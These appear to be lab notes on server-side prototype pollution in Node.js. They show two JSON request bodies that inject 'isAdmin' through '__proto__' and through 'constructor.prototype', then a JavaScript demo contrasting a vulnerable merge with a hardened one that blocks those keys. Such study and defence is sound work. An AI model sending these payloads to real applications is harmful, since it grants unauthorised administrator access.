Server-Side Prototype Pollution

Node.js

Manual

JSON POST exploit: detect a property that can be overridden through the prototype, for example 'isAdmin'.

POST /my-account/change-address HTTP/2
...

{
    "address_line_1":"Wiener HQ",
    "address_line_2":"One Wiener Way",
    "city":"Wienerville",
    "postcode":"BU1 1RP",
    "country":"UK",
    "sessionId":"J6S7DSImv3MxUuIjxry16DyY48VCw49x",
    "__proto__": {
        "isAdmin":true
    }
}

If the '__proto__' key is filtered, try the 'constructor' / 'prototype' path instead (same effect):

{
    "address_line_1":"Wiener HQ",
    "address_line_2":"One Wiener Way",
    "city":"Wienerville",
    "postcode":"BU1 1RP",
    "country":"UK",
    "sessionId":"J6S7DSImv3MxUuIjxry16DyY48VCw49x",
    "constructor": {
        "prototype": {
            "isAdmin":true
        }
    }
}
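
Why both payload shapes above end up on Object.prototype, and a merge that blocks them, as an added example that is not part of the original notes. The names unsafeMerge, safeMerge and check are hypothetical, and the request bodies are constructed, shortened versions of the ones above.

```javascript
// Constructed, shortened request bodies in the two shapes shown above.
const viaProto = '{"city":"Wienerville","__proto__":{"isAdmin":true}}';
const viaConstructor =
  '{"city":"Wienerville","constructor":{"prototype":{"isAdmin":true}}}';

const isObj = (v) => v !== null && (typeof v === 'object' || typeof v === 'function');
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// Hypothetical vulnerable merge: it recurses into whatever target[key] resolves
// to, including the inherited __proto__ accessor and the inherited constructor.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isObj(value)) {
      if (!isObj(target[key])) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: drops the three keys that lead to a prototype and only
// recurses into properties the target owns itself.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED.has(key)) continue;
    const value = source[key];
    if (isObj(value)) {
      if (!hasOwn(target, key) || !isObj(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Returns true if merging the body made isAdmin visible on an unrelated object.
function check(merge, body) {
  merge({}, JSON.parse(body));
  const polluted = ({}).isAdmin === true;
  delete Object.prototype.isAdmin; // clean up so runs do not affect each other
  return polluted;
}

console.log('unsafe:', check(unsafeMerge, viaProto), check(unsafeMerge, viaConstructor));
console.log('safe:  ', check(safeMerge, viaProto), check(safeMerge, viaConstructor));
```

JSON.parse stores "__proto__" as an ordinary own property, so the pollution happens in the merge step, not in parsing; that is why the key filter belongs in the merge.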

Scanner

Extension: Burp's 'Server-Side Prototype Pollution Scanner' can be used.
